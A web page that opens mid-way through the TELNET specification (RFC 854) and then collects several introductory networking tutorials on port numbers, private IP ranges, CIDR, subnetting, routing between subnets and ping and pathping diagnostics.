         The recipient should delete the last preceding undeleted

         character or "print position" from the data stream.

      Erase Line (EL)

         The recipient should delete characters from the data stream

         back to, but not including, the last "CR LF" sequence sent over

         the TELNET connection.

      The spirit of these "extra" keys, and also the printer format

      effectors, is that they should represent a natural extension of

      the mapping that already must be done from "NVT" into "local".

      Just as the NVT data byte 68 (104 octal) should be mapped into

      whatever the local code for "uppercase D" is, so the EC character

      should be mapped into whatever the local "Erase Character"

      function is.  Further, just as the mapping for 124 (174 octal) is

      somewhat arbitrary in an environment that has no "vertical bar"

      character, the EL character may have a somewhat arbitrary mapping

      (or none at all) if there is no local "Erase Line" facility.

      Similarly for format effectors:  if the terminal actually does

      have a "Vertical Tab", then the mapping for VT is obvious, and

      only when the terminal does not have a vertical tab should the

      effect of VT be unpredictable.

TELNET COMMAND STRUCTURE

   All TELNET commands consist of at least a two byte sequence:  the

   "Interpret as Command" (IAC) escape character followed by the code

   for the command.  The commands dealing with option negotiation are

   three byte sequences, the third byte being the code for the option

   referenced.  This format was chosen so that as more comprehensive use

   of the "data space" is made -- by negotiations from the basic NVT, of

   course -- collisions of data bytes with reserved command values will

   be minimized, all such collisions requiring the inconvenience, and

RFC 854                                                         May 1983

   inefficiency, of "escaping" the data bytes into the stream.  With the

   current set-up, only the IAC need be doubled to be sent as data, and

   the other 255 codes may be passed transparently.

   The following are the defined TELNET commands.  Note that these codes

   and code sequences have the indicated meaning only when immediately

   preceded by an IAC.

      NAME               CODE              MEANING

      SE                  240    End of subnegotiation parameters.

      NOP                 241    No operation.

      Data Mark           242    The data stream portion of a Synch.

                                 This should always be accompanied

                                 by a TCP Urgent notification.

      Break               243    NVT character BRK.

      Interrupt Process   244    The function IP.

      Abort output        245    The function AO.

      Are You There       246    The function AYT.

      Erase character     247    The function EC.

      Erase Line          248    The function EL.

      Go ahead            249    The GA signal.

      SB                  250    Indicates that what follows is

                                 subnegotiation of the indicated

                                 option.

      WILL (option code)  251    Indicates the desire to begin

                                 performing, or confirmation that

                                 you are now performing, the

                                 indicated option.

      WON'T (option code) 252    Indicates the refusal to perform,

                                 or continue performing, the

                                 indicated option.

      DO (option code)    253    Indicates the request that the

                                 other party perform, or

                                 confirmation that you are expecting

                                 the other party to perform, the

                                 indicated option.

      DON'T (option code) 254    Indicates the demand that the

                                 other party stop performing,

                                 or confirmation that you are no

                                 longer expecting the other party

                                 to perform, the indicated option.

      IAC                 255    Data Byte 255.

RFC 854                                                         May 1983

CONNECTION ESTABLISHMENT

   The TELNET TCP connection is established between the user's port U

   and the server's port L.  The server listens on its well known port L

   for such connections.  Since a TCP connection is full duplex and

   identified by the pair of ports, the server can engage in many

   simultaneous connections involving its port L and different user

   ports U.

   Port Assignment

      When used for remote user access to service hosts (i.e., remote

      terminal access) this protocol is assigned server port 23

      (27 octal).  That is L=23.

Comment on RFC 854 Comment on RFC 854

Getting Familiar with TCP/IP Port Numbers

By Dan DiNicolo, April 16th, 2007 Posted in Security.

Certainly you don’t need to know anything about port numbers if you never plan to allow external users to access your network, or if you don’t plan to control the types of Internet services that your internal users can use. However, if you do plan to make use of either feature, you’ll need to know something about port numbers.

Different types of applications use different port numbers to communicate. Port numbers come in two flavors, namely TCP and UDP. Transmission Control Protocol (TCP) is a reliable protocol used by some applications (such as Web, FTP, and Email servers), while User Datagram Protocol (UDP) is a faster (but unreliable) protocol used by services like DNS. You don’t get to choose which is used – the specifications for different services define which protocol is used which individual applications.

A total of 65536 TCP/UDP port numbers exist. Certainly no one could remember all of them, but some of them are much more common than others. For example, the list below outlines some of the port numbers used by common services:

HTTP (Web servers) – TCP 80
FTP (FTP servers) – TCP 21
SMTP (Email servers) – TCP 25
POP3 (Email servers) – TCP 110
DNS (Name resolution) – UDP 53

This is far from a comprehensive list, but gives you the idea. So, if you plan on having your own internal FTP server that should be accessible from the Internet, port forwarding would need to be enabled on your router for TCP ports 20 and 21. If you’re using ICF, a definition for FTP already exists which you can simply check off to accomplish the same task. For a complete and very comprehensive list of port numbers, see

Private IP Addresses

By Dan DiNicolo, April 13th, 2007 Posted in Windows XP

In the same way that you can’t just randomly choose the numbers to use for an IP address, you also need to be careful with the addresses you ultimately use. IP addresses used on the public Internet are assigned to companies from organizations like RIPE (the European IP address registry), or from an ISP. Although using a range assigned to a company might work on your home network, it can also impact your ability to connect to certain Internet resources. It’s for that reason that “private” IP addresses exist.

Private IP addresses were designated as a solution to the public Internet quickly running out of available addresses. As the Internet has grown, the number of available unique IP addresses has quickly dwindled. In order to satisfy the need for more IP addresses, certain ranges were designated as private, or available for anyone (including home or business networks) to use. These addresses are not valid on the public Internet, so they do not impact TCP/IP communication outside of a network. For example, you could be using the same private IP addresses on your network as your neighbor is, and the whole Internet would still function in peace and harmony.

This begs the question – if private IP addresses aren’t valid on the Internet, how can the computers on your home network access Internet resources? The answer is found in something called Network Address Translation (NAT). When a computer using a private IP address wants to access the Internet, that private address must be “translated” to a public address that is valid on the Internet. On your home network, one system (such as a dedicated router or one of your PCs) will still need at least one public address that will be shared amongst your internal computers. On systems like Windows 98 or XP, this functionality is provided by a service known as Internet Connection Sharing, or ICS. More on ICS and other NAT techniques will follow later in the series.

For now, the most important thing for you to remember is that you should always use private IP addresses on your internal network. These are first and foremost more secure, and will help you to avoid problems later. The private IP address ranges available to anyone who wants to use them are:

10.0.0.1 to 10.255.255.254
172.16.0.1 to 172.31.255.254
192.168.0.1 to 192.168.255.254

In general, most home users tend to stick with addresses that start with 192.168, and you should as well to keep things simple. For example, if you start all of your IP addresses with 192.168.1.X, you can support up to 254 IP addresses on your home network, which should be more than you would ever need.

TELNET Protocol Overview

The TELNET protocol, designed for terminal-oriented remote login, is documented in RFC 854.

TELNET operates using the TCP Protocol, and depends heavily on option negotiation. TELNET options are documented in their own (usually short) RFCs. The organization of these RFCs, and instructions for registering new TELNET options, is found in RFC 855. Many TELNET options exist; a complete, current list can be found in the Internet Official Standards RFC, currently RFC 2400. A copy of this list appears below.

TELNET Options

Protocol   Name                           Number  State Status  RFC STD

========   =====================================  ===== ====== ==== ===

TOPT-BIN   Binary Transmission                 0  Std   Rec     856  27

TOPT-ECHO  Echo                                1  Std   Rec     857  28

TOPT-RECN  Reconnection                        2  Prop  Ele     ...

TOPT-SUPP  Suppress Go Ahead                   3  Std   Rec     858  29

TOPT-APRX  Approx Message Size Negotiation     4  Prop  Ele     ...

TOPT-STAT  Status                              5  Std   Rec     859  30

TOPT-TIM   Timing Mark                         6  Std   Rec     860  31

TOPT-REM   Remote Controlled Trans and Echo    7  Prop  Ele     726

TOPT-OLW   Output Line Width                   8  Prop  Ele     ...

TOPT-OPS   Output Page Size                    9  Prop  Ele     ...

TOPT-OCRD  Output Carriage-Return Disposition 10  Prop  Ele     652

TOPT-OHT   Output Horizontal Tabstops         11  Prop  Ele     653

TOPT-OHTD  Output Horizontal Tab Disposition  12  Prop  Ele     654

TOPT-OFD   Output Formfeed Disposition        13  Prop  Ele     655

TOPT-OVT   Output Vertical Tabstops           14  Prop  Ele     656

TOPT-OVTD  Output Vertical Tab Disposition    15  Prop  Ele     657

TOPT-OLD   Output Linefeed Disposition        16  Prop  Ele     658

TOPT-EXT   Extended ASCII                     17  Prop  Ele     698

TOPT-LOGO  Logout                             18  Prop  Ele     727

TOPT-BYTE  Byte Macro                         19  Prop  Ele     735

TOPT-DATA  Data Entry Terminal                20  Prop  Ele    1043

TOPT-SUP   SUPDUP                             21  Prop  Ele     736

TOPT-SUPO  SUPDUP Output                      22  Prop  Ele     749

TOPT-SNDL  Send Location                      23  Prop  Ele     779

TOPT-TERM  Terminal Type                      24  Prop  Ele    1091

TOPT-EOR   End of Record                      25  Prop  Ele     885

TOPT-TACACS  TACACS User Identification       26  Prop  Ele     927

TOPT-OM    Output Marking                     27  Prop  Ele     933

TOPT-TLN   Terminal Location Number           28  Prop  Ele     946

TOPT-3270  Telnet 3270 Regime                 29  Prop  Ele    1041

TOPT-X.3   X.3 PAD                            30  Prop  Ele    1053

TOPT-NAWS  Negotiate About Window Size        31  Prop  Ele    1073

TOPT-TS    Terminal Speed                     32  Prop  Ele    1079

TOPT-RFC   Remote Flow Control                33  Prop  Ele    1372

TOPT-LINE  Linemode                           34  Draft Ele    1184

TOPT-XDL   X Display Location                 35  Prop  Ele    1096

TOPT-ENVIR Telnet Environment Option          36  Hist  Not    1408

TOPT-AUTH  Telnet Authentication Option       37  Exp   Ele    1416

TOPT-ENVIR Telnet Environment Option          39  Prop  Ele    1572

TOPT-EXTOP Extended-Options-List             255  Std   Rec     861  32

Checking TCP/IP Network Settings with IPCONFIG

By Dan DiNicolo, April 17th, 2007 Posted in Windows Commands.

If you’re connected to a TCP/IP network, the IPCONFIG utility is one that you need to be familiar with. Most users are familiar with the tool from using it to renew an IP address allocated by a DHCP server via the /renew switch. However, IPCONFIG provides a wealth of useful information about your system’s TCP/IP settings, especially when the /all switch is issued. This command will display information about the state of your connection, whether DHCP is being used, the IP address, subnet mask, and default gateway configured on your system, and more.

Classless Inter-Domain Routing (CIDR) aka Supernetting

By Dan DiNicolo, June 2nd, 2006 Posted in CCNA Study Guide Chapter 05.

Recall that classful addresses are decidedly wasteful in the way they allocate addresses –even an entire Class B address range is too large for most companies. To make matters worse, a Class C block is so small that many companies would require many Class C ranges as a viable alternative. On the public Internet, routing tables were becoming extremely large, which in turn was affecting routing performance. A new solution was required to deal with the public address space more efficiently, and came about via a method referred to as Classless Inter-Domain Routing (CIDR).

CIDR is sometimes referred to as supernetting. While subnetting involves taking an address space and breaking it up into a number of smaller networks, supernetting is first and foremost a network aggregation scheme. For example, by supernetting four network addresses together, you can actually make them appear to be one network, as opposed to four. Again, this is all accomplished by playing with the subnet mask values.

CIDR has its own notation for dealing with subnet masks, and you may already be familiar with it. Instead of taking the time to say network 131.107.0.0 with a subnet mask of 255.255.0.0, CIDR notation truncates the subnet mask to what is known as “slash” notation. In this example, the network would be identified as 131.107.0.0/16. The “/16” value refers to the fact that the first 16 bits in the subnet mask are all set to values of binary 1.

Figure: Determining CIDR notation based on a subnet mask.

This really is a more efficient way of referring to a network. For example, if we had a network address of 192.168.0.0 with a mask of 255.255.255.128, in CIDR notation it becomes 192.168.0.0/25. Again, the /25 means that the first 25 bits of the subnet mask are set to binary 1.

But what is supernetting really? Well, imagine a routing table on a large Internet backbone router. This router needs to know how to get to all public networks. If a certain company has been given many different network IDs (for example, an ISP might have 8 Class B network IDs), a minimum of 8 routing table entries would be required, just to be sure that these 8 networks could be reached. As routing tables get larger and larger, routing performance is definitely impacted. Supernetting provides a way to “collapse” or “summarize” those 8 entries into a single entry, by altering the subnet mask value.

Figure: Determining CIDR notation based on a subnet mask.

Tip: Supernetting allows contiguous network addresses to be summarized into a single routing table entry through the use of a custom subnet mask.
The first requirement to supernet addresses together is that network addresses must be contiguous. For example, you could supernet together networks 131.107.0.0 and 131.108.0.0, but not networks 131.107.0.0 and 145.36.0.0.

Classless IP Addressing

By Dan DiNicolo, June 2nd, 2006 Posted in CCNA Study Guide Chapter 05.

concept of classful addresses, where the default network and host portions of a network address can be easily identified by the value found in the first octet. While the classful system is simple and convenient, the scheme brings about some problems – mainly inefficiently large routing tables, and a wasteful use of the available 32-bit address space. In order to compensate for this, the idea of classless addressing was developed.

A classless address is just that – addressing without the common Class A, B, or C designations. Instead, classless addressing doesn’t assume any class – it always includes the associated subnet mask (also referred to as the network “prefix”) in order to determine the network portion of an address. Recall how classful addresses have a default subnet mask associated with them. In the classful world, routers could just assume the class of an address based on the network ID. In the classless world, subnet mask information must always be provided when routers exchange information with each other. Some routing protocols, such as the Border Gateway Protocol (BGPv4) and OSPF, support classless addressing. Others, like RIP version 1, do not.

Communication Across a Simple Routed Network

By Dan DiNicolo, June 28th, 2006 Posted in CCNA Study Guide Chapter 08

where a single router connects to networks 192.168.0.0/16 and 10.0.0.0/8. By this point, you should recognize these network addresses as two of the private IP address ranges that are not valid on the public Internet. The router is a simple 2-port Ethernet router, with interface E0 connected to the 192.168.0.0 network, and interface E1 connected to the 10.0.0.0 network. Both interfaces on the router have already been assigned their IP addresses, 192.168.0.1 and 10.0.0.1 respectively. Using an IP address that ends in “.1” for router interfaces is fairly common. It is not a rule, but rather a convention. You may or may not choose to follow this convention, but it does make the IP address of a router interface easier to remember.

Figure: A simple routed internetwork.

Believe it or not, without configuring anything else on this router, it is already capable of routing data between network 192.168.0.0 and network 10.0.0.0. How is this possible? Well, the first thing you need to understand is that after assigning a Cisco router IP addresses, it knows about the networks that it is directly connected to, and the command ip routing is enabled by default. In other words, the router is aware that interface E0 is connected to the 192.168.0.0 network, and that interface E1 is connected to network 10.0.0.0. A router will automatically add both of these networks to its routing table. If our router receives a packet destined for the 192.168.0.0 network on interface E1, it will know to forward it out interface E0. In the same way, interface E0 knows that any traffic destined for network 10.0.0.0 should be forwarded out interface E1. A router always knows how to get to the networks to which it is directly connected, without any additional configuration. Things get a little more complex when a router needs to get to networks that are not directly connected.

Each network in this example also has a single host configured, as shown in Figure 8-2. Notice that each host has an IP address, subnet mask, and default gateway value assigned. The default gateway IP address is that of the local router interface on the host’s network. Hosts will forward traffic to the router when they calculate that the destination host is not on their local network.

Figure: Simple routed network with 1 host on each network.

In this example, each network is a Layer 2 broadcast domain, running Ethernet. Both networks are also unique Layer 3 IP networks, as shown by their logical layout. On most (but not necessarily all) networks, each broadcast domain will be associated with a unique IP network (or subnet) address.

There are cases, however, where the preceding statement is not necessarily true. For example, a company may run out of IP addresses and choose to map two subnets to a single broadcast domain. Making things work would then involve adding a second IP address to the local router interface. Even through hosts will be in the same broadcast domain, the router will still need to route packets between the different subnets. I didn’t say it was efficient, but it is something that you may come across.

For the purpose of illustration, I’m going to assume that Host A wishes to communicate with Host B. In order for these two hosts to communicate, our router will obviously need to be involved. Let’s take a look at how the communication process occurs when Host A attempts to create an HTTP session with Host B.

The first step in the process is the creation of an HTTP request at the Application Layer. In this case, Host A is requesting a web page from Host B. After formatting the HTTP request, the data is passed down to the Transport layer. Remember, our interaction is happening over TCP/IP.
Once the Transport Layer on Host A receives the data, it will add header information that will include the source and destination TCP ports. In this case, the destination TCP port will be 80, and the source port some number above 1024. Once this is complete, the segment will be passed to the Network Layer.
At the Network Layer, the IP header will be added. This header will include a variety of information, but most importantly the source and destination IP addresses. The source address is 192.168.0.99, and the destination address is 10.0.0.100. The next step is passing the packet down to the Data Link layer.
Recall the ANDing process looked at in Chapter 5. This is the process that a host uses to determine whether a destination host is local or remote. In this case, the ANDing results will be different, which means that the destination is on a remote network. When a destination is remote, the packet cannot be sent directly to that host. Instead, it must be first sent to a router.
Pay particular attention to this step. Host A knows that it needs to send this packet to its local router, but the router is not the ultimate destination IP address – 10.0.0.100 (Host B) is. In order to get this data to the router, our host must frame the packet with the destination MAC address – in this case, the MAC address associated with the router’s E0 interface. To obtain this MAC address, it will send out an ARP request looking for the MAC address associated with 192.168.0.1. Once the router responds, Host A will frame the packet. In this case, the source address is the MAC address of Host A, and the destination address is the MAC address of the router’s E0 interface.
Ultimately, this frame will reach interface E0 on the router. The router will notice that the frame is destined for its MAC address, and as such it will process the frame. After calculating the frame’s CRC, it will strip off the frame header and pass the resulting packet up to the Network layer At this point, the router will notice that the destination IP address is not it’s own. When a router receives a packet that is not destined for it specifically, it looks in its routing table to see whether it has a route defined to the destination network. In this case, the router sees that it is directly connected to network 10.0.0.0/8, and also determines that it should forward the packet via interface E1. Before it can forward the packet, however, it has to pass it back down to the Data Link Layer for re-framing.
At the Data Link layer, the router will re-frame the packet with a new header, meaning that source and destination MAC addresses will need to be added. In this case, the source MAC address is now the MAC address of interface E1 on the router. The destination MAC address will be obtained via an ARP request to IP address 10.0.0.100. Once Host B replies with its MAC address, this will be added to the frame as the destination MAC address. The router will then calculate a new CRC for the frame, and forward it through interface E1 as a series of bits.
Eventually the frame will arrive at Host B. By inspecting the destination MAC address, Host B will recognize that the frame is meant for it, calculate the CRC, strip off the framing, and pass it up to the Network Layer.
At the Network Layer, Host B will also recognize its IP address as the destination. This means that it has to process the packet further. In the IP header, it will see that the data should be passed to TCP at the Transport layer.
At the Transport Layer, Host B will look at the destination TCP port, and recognize that the data contained in the segment should be sent to TCP port 80. This is the port on which the web server application is listening for connections.
The web server on Host B will process the HTTP request contained in the data. Ultimately it will need to send a reply, where the whole process happens again, in reverse.

If those twelve steps seem like an awful lot of work to pass data between two hosts, you’re right. However, this is the way things work when you want to communicate between hosts on a routed network. Think of it this way – we are effectively using a Layer 3 protocol (IP) to communicate between different Layer 2 networks. In this case, both of those networks were Ethernet, but that won’t always be the case. For example, what if Host B had resided on a Token Ring network? In that case, our router would require one Ethernet interface and one Token Ring interface. When the data was sent to the router from Host A, it would have been framed for Ethernet. After the router stripped off the framing and passed the data up to the Network layer, it would determine that the packet needed to be forwarded out the Token Ring interface, where it would need to be framed for Token Ring. As even this very basic example suggests, a router is doing a great deal of work to every packet it encounters – not only does it have to make a forwarding decision based on the destination IP address, but it also has to reframe every single packet that it forwards on its way. By this point, you should be recognizing some of the reasons as to why routing is typically much slower than switching.

You should also recognize that although packets are re-framed at the router, the actual source and destination IP addresses never change. In fact, the only thing that the router touches for certain in the IP header is the time-to-live (TTL) value. Recall that a router will always decrement the TTL on an IP packet that it forwards by one, which ultimately ensures that packets don’t end up being forwarded around a network forever. Once its TTL expires, a packet is discarded.

A router may further alter an IP packet under special circumstances, such as when the maximum transmission unit (MTU) of connected networks is different. For example, imagine that the networks connected were Ethernet and Token Ring. Token Ring has a much larger maximum frame size than Ethernet. When a frame is received on a Token Ring interface, the packet it contains may be much larger than what Ethernet can handle (recall that the MTU of an Ethernet frame is only 1518 bytes). In this case, the router will “chop up” or fragment the packet into a number of smaller packets, then reframe each and send them on their way. Again, it becomes clear that there is more to what a router does than initially meets the eye.

Subnetting IP Networks

By Dan DiNicolo, May 31st, 2001 Posted in Windows 2000.

t sometimes amazes me that people get so worked up about subnetting, because it really is quite simple. First of all, you need to recognize that in order to really understand subnetting (at least starting off), looking at the numbers in decimal notation makes very little sense. You need to be looking at numbers in binary to really understand what is happening. The beauty of binary numbering is its simplicity – each value can only be a 1 or a 0. Note that each section (octet) of an IP address can be represented by a series of eight bits. There are 4 octets, so 32 bits altogether. That means any IP address can be also looked at as a 32-bit binary number. The table below outlines binary numbering corresponding values.

Decimal 128 64 32 16 8 4 2 1
Binary 1 1 1 1 1 1 1 1

What this means is simple. If I were to ask for the value of 11001100 in decimal, it would be 128+64+0+0+8+4+0+0, which equals 204. Each bit corresponds to the decimal value above it – add the values for each ‘1’ value and you have the answer. 11111111 would be 128+64+32+16+8+4+2+1, which equals 255 (which is also the highest possible decimal value in an 8-bit binary number).

But what about converting decimal numbers to binary? Well, it’s different, but no more difficult. Start at the left on the chart above, and add the decimal values together until you reach your total. Every number you use is a ‘1’ and every number you leave out is a ‘0’. For example, let’s take the number 77. This would be 01001101. Say what? Well, I just started adding numbers left to right, leaving out numbers that put me over 77. In this example, I have 0+64+0+0+8+4+0+1. Simple.

You can also do this using a calculator program with a scientific mode. Just type is a number in decimal and hit the BIN button. The number will then be displayed in binary. However, the calculator has no idea that you’re dealing in 8-bit numbers, so you’ll have to be careful. For example, my calculator will tell me that 77 in binary is 1001101. That is, it leaves off any leading zeros. As such, you’ll need to remember to ‘pad out’ your binary numbers to 8 bits if you use the calculator. For example, the calculator will show decimal 8 as binary 1000. For an IP address, we need to add the 4 other zeros, making it 00001000. You’ll have access to the calculator on the exam, so know how to use it.

After you understand binary numbering, subnetting is easy. First of all, we need to discuss what subnetting is. Quite simply, it is taking a big network ID and breaking it down into a number of smaller networks, or subnets. Routers are what usually separate subnets. Reasons for subnetting include connecting different topologies (such as Ethernet and Token ring), as well as making networks smaller and more manageable. Subnets are also sometimes referred to as broadcast domains, since a broadcast sent on a subnet goes to all hosts on that subnet

For the purpose of any exam, you will need to recognize and understand how subnetting works. This includes being able to view system configurations and determine why clients are having trouble communicating. As such, you’ll need to be able to recognize valid IP addresses, subnet mask values, and what range of IP addresses are valid on a given subnet. Let’s start with a look at valid subnet mask values.

A subnet mask means little in decimal. In binary, however, they tell a story. The subnet mask is what tells us which of the 32-bits in an IP address represent the network identification, and which represent the host identification. In the example below, the host IP address is 156.77.11.3 and the subnet mask is /21, or 255.255.248.0. In decimal, it is difficult to determine which portion represents the network and which the host. However, it binary the mask value is:

11111111 11111111 11111000 00000000

So what does that tell me? That the first 21 bits are used to represent the network, and the last 11 bits are used to represent a host on the network. Actually, it tells me more than that. It also tells me how many hosts I can have per network. How? Well, if eleven bits are used to represent a host, then this subnet can have 2046 hosts. How did I get that? Simple: 2 to the power of 11, minus 2. That equals 2048 minus 2, or 2046. Why minus 2? You subtract 2 because a host value of all binary 0’s represents the subnet, and a value of all binary 1’s is the broadcast address for this subnet.

If the subnet mask in the example above had been /17, or 255.255.128.0, that would leave 15 bits for host addresses. That would mean 2 to the power of 15 minus 2 hosts, or 32766 total.

Figuring that stuff out should now be easy enough as well. The big question, and the key thing you need to be able to do, is to be able to determine if a host ID is valid on a subnet. Every subnet has a range of addresses that are valid on it. In my last example, there were 32766 valid host addresses. You need to be able to determine which ones are valid for the subnet. It isn’t that hard, but you need to know what you’re looking for.

Let’s say that we’ve been given an address of 156.17.42.6/20, and we’re trying to determine the range of valid host IDs on this subnet. The first step is to determine the actual network ID on which this host falls. The process we use to determine this is called ANDing. When we want to AND an IP address and subnet mask, we first convert them to binary and line the subnet mask below the IP address. Then, calculate the AND value. In an AND operation, values are calculated as follows:

1 and 1 = 1
1 and 0 = 0
0 and 0 = 0

In our example, this would give us:

IP 10011100 00010001 00101010 00000110

SM11111111 11111111 11110000 00000000

AND 10011100 00010001 00100000 00000000

After we convert our ANDed address back to decimal we get 156.17.32.0. This is the network ID that our host falls onto.

Stay with me here. We know that our mask is 255.255.240.0 (or /20). So, we know that the last 12 bits represent the hosts on this network. The network bits are in black below, the host bits in red. We already know that a host ID cannot be all zeros or all ones in binary. So, when I’m calculating the range of valid IPs on this subnet/network, I can’t have either of these values. This leaves me with:

Network ID 10011100 00010001 00100000 00000000

First Valid Host ID 10011100 00010001 00100000 00000001

Last Valid Host ID 10011100 00010001 00101111 11111110

Note that the first valid host ID sets all host bits to zero except the last (called the least-significant bit), and the last valid host ID sets all host bits to one, except the last. What did I lose? Two addresses – the host ID being all zeros (which defines the network) and the host ID being all ones (the broadcast address, which is not valid for a host). These are the same 2 addresses that I subtract when trying to find how many hosts I can have per subnet. If I convert my ranges above to decimal, I end up with a range of:

156.17.32.1 to 156.17.47.254

The truth of the matter is that you won’t necessarily have time to ‘do the math’ for every question that comes at you during the exam, so you’ll need a way to quickly determine what ranges of hosts are valid on a subnet given a certain mask. For this purpose, I am providing the chart below. You can use this chart to quickly determine the valid ranges of IP addresses on a subnet based on the mask value, and where the next range starts. Please do not use this chart as a crutch if you don’t understand how to determine valid ranges as we went through above. This is meant as a shortcut for those who already understand.

Mask 128 192 224 240 248 252 254 255

Network ID 128 64 32 16 8421

How the chart works is simple. Let’s say I’ve been given a host ID of 167.23.87.13 with a mask of 255.255.248.0, and I want to quickly determine the range of host IP addresses valid on the same subnet as this host. This address is subnetted into the third octet based on the mask, so we take the third octet value (248) and plug it into the chart above. The Network value that corresponds to 248 is 8. As such, that means that every new subnet starts at a multiple of 8 in the third octet. For example:

167.23.0.0 subnet0 range = 167.23.0.1 to 167.23.7.254 *
167.23.8.0 subnet1 range = 167.23.8.1 to 167.23.15.254
167.23.16.0 subnet2 range = 167.23.16.1 to 167.23.23.254
167.23.24.0 subnet 3 range = 167.23.24.1 to 167.23.31.254
167.23.32.0 subnet 4 range = 167.23.32.1 to 167.23.39.254
…
167.23.80.0 subnet10 range = 167.23.80.1 to 167.23.87.254
…
167.23.240.0 subnet30 range = 167.23.240.1 to 167.23.247.254
167.23.248.0 subnet31 range = 167.23.248.1 to 167.23.255.254 *

* Although these ranges were usually omitted in a classful IP addressing system, they are totally valid under CIDR. Often these ranges are still omitted, however, due to the fact that some older equipment may not reference the ranges properly.

Note that our host is on subnet10, the range in red above. The same rules as always still apply, so be careful. The host ID cannot be all 0’s or 1’s. As another example, if the address had been 17.13.5.1/14, the subnet mask would be 255.252.0.0, making the range of addresses on the same subnet as this host everything on subnet 17.12.0.0, since new ranges start in multiples of 4. That would make the valid range:

17.12.0.1 to 17.15.255.254

If you go back to the ANDing process, and calculate the first and last host IDs in binary, you’ll see that we’ve come up with the same answer, only much more quickly!

As I mentioned from the outset, this section was not meant to be a complete explanation of designing a subnetting scheme for a network. Instead, we learned how to define valid ranges of addresses based on a host ID and mask value, both in binary and using the shortcut method. You will need to be able to troubleshoot IP addressing, and that’s what I’ve focused on above. Once you can calculate valid ranges, you can then determine which host IDs are local and remote, and which hosts are capable of communicating properly. Only hosts that fall into the same range should be on the same subnet. You also now know that the problem may be the address or the subnet mask values of the hosts in question.

Understanding the Purpose of Subnet Masks

By Dan DiNicolo, April 13th, 2007 Posted in Home Networking

Subnet masks are easily one of the most confusing elements in the configuration of TCP/IP, although they need not be. In large, complex networks, subnet masks like 255.255.255.0 are used to segment IP addresses from one large network into many smaller ones. For example, a large corporate might be assigned a range of IP addresses by their ISP, and then want to internally divide their network into a number of smaller networks to improve overall performance. At the end of the day, subnet masks are used to help a host determine which portion of an IP address represents the network, and which part represents the host. While the class of an IP address does this, many companies create custom subnet masks that divide their networks beyond typical class boundaries. Based on the combination of an IP address and subnet mask, a host can determine whether a destination host is one the same network, or a different one.

The good news is that for a home network, you really don’t need to put much thought into the subnet mask to be used. Windows will automatically populate the subnet mask field in your TCP/IP configuration after you specify the IP address to be used. Effectively, the value generated is known as the “default” subnet mask based on the class of address you input. So, is you used the Class A IP address 10.1.1.1 for a host, the subnet mask 255.0.0.0 would be allocated automatically. In this case, the “255” means that the first octet of the IP address identifies the network, and the last three octets identify a host. Similarly, entering a Class C IP address of 192.168.1.1 would result in Windows automatically entering the subnet mask 255.255.255.0, in which case the first three octets of the IP address identify the network, and the last represents a host.

For best results, make sure that your PCs are configured with IP addresses in the same network range (such as all starting with 192.168.1), and then let Windows specify the subnet mask automatically. If incorrect subnet masks values are configured, computers on the same network may not be able to communicate.

Testing Network Connectivity with the PATHPING Command

By Dan DiNicolo, April 17th, 2007 Posted in Windows Commands

A more advanced version of the PING command, PATHPING provides more detailed network troubleshooting information by not only sending requests to the destination host specified, but also all intermediate routers on the path to the destination. Ultimately, this allows the tool to calculate the degree of packet loss every step of the way to the destination, allowing you to determine where problems are occurring. For example, what might appear to be a problem with the site www.yahoo.com might actually be an issue with one of the routers or links on the way to this server.

Testing Network Connectivity with the PING Command

By Dan DiNicolo, April 17th, 2007 Posted in Windows Commands

Rather Have Fast and Secure Remote Control?

Securely access PCs and servers worldwide through any firewall. Try it and see for yourself!

Perhaps no command line utility is more familiar to users than PING. On a TCP/IP network, the PING utility allows you to determine whether another system is reachable, while at the same time providing basic diagnostic information such as whether any packets are being lost en route. When troubleshooting a network connection, PING is almost always the first tool that any users will unleash to gather basic information. When issued with the –t command, PING will continuously send requests to a host until manually stopped with the CTRL+C command.

The Ping Diagnostic Utility

By Dan DiNicolo, June 26th, 2006 Posted in CCNA Study Guide Chapter 07.

You are probably familiar with the ping utility from Windows or Linux. The version included with the Cisco IOS provides significantly enhanced functionality, and can be used to test connectivity for a variety of different protocols including IP, IPX, AppleTalk and more. To get a sense of the functions provided by ping, issue the ping command followed by the question mark.

cisco2501#ping ?
WORD Ping destination address or hostname
appletalk Appletalk echo
decnet DECnet echo
ip IP echo
ipx Novell/IPX echo
tag Tag encapsulated IP echo

Notice the range of protocols that ping can work with. In fact, the list can be even longer depending on the protocols supported by your IOS version. At the most basic level, ping sends out echo request messages and expects to receive back echo replies. It is important to be clear about the information that a ping provides. For example, if you can ping an IP host on a different network, it suggests that both hosts have TCP/IP correctly initialized and configured, and that routing between the networks is also configured correctly. In cases where you cannot ping a remote host, don’t jump to the conclusion that the remote host is unavailable or misconfigured – though it might be, the problem may also be a configuration issue with the source host, or potentially some routing-related (or physical connectivity) issue between the two. As a general rule, use the following steps to determine the source of connectivity issues between your PC and a remote system:

Assuming that your IP address, subnet mask, and default gateway are correct, attempt to ping a host on a different subnet. If this fails, one possibility is that routing is not configured correctly.
If pinging a remote host fails, attempt to ping your default gateway. If this fails, it may indicate that TCP/IP is not configured correctly on your local router interface, on your host PC, or that the router interface has not been enabled with the no shutdown command.
If pinging your default gateway fails, try pinging your host’s configured IP address. If this fails, it can may mean that you have configured your host PC’s IP address incorrectly, or that TCP/IP is not properly installed or initialized on the host system.
If pinging the host’s IP address fails, try pinging the loopback address – 127.0.0.1. If this fails, it generally indicates that TCP/IP is not properly installed or initialized on your host system.

To test IP connectivity, use the ping command followed by a hostname or IP address.

cisco2501#ping accra
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.1.209, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/4/4 ms

The ping was successful in this case, as illustrated by the five exclamation points and the final statement. In cases where a ping fails, you’ll see a message similar to the one shown below.

cisco2501#ping 192.168.1.234
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.1.234, timeout is 2 seconds:
.....
Success rate is 0 percent (0/5)

When the exclamation points are replaces by dots, it means that for whatever reason, the destination host did not respond successfully. Again, this could suggest a range of issues including misconfiguration, physical network issues, routing problems, and so forth.

An extended ping allows a higher degree of control than the default ping settings, including the ability to change the repeat count, size of the datagrams, and so forth. The example below outlines an IPX ping using the extended ping interface.

cisco2501#ping
Protocol [ip]: ipx
Target IPX address: 101A.0060.5cc4.f41b
Repeat count [5]:
Datagram size [100]:
Timeout in seconds [2]:
Verbose [n]:
Type escape sequence to abort.
